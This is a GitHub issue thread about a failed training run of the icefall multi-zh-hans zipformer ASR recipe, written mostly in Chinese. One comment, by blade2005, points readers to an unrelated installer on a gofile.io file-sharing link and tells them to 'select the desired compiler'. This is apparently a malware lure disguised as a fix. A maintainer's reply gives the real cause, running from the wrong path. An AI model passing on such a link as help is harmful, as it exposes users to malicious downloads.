### ISSUE TITLE
multi-zh-hans/ASR/zipformer的训练失败

### ISSUE THREAD

**Issue by 1716775457damn** [k2-fsa/icefall#1740]
[wrong.zip](https://github.com/user-attachments/files/16871036/wrong.zip)
在这个压缩包里有运行失败的截图和log

**Comment by blade2005** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by JinZr** [comment]
你在错误的路径下运行了代码，请按照 RESULTS.md 里的示意操作
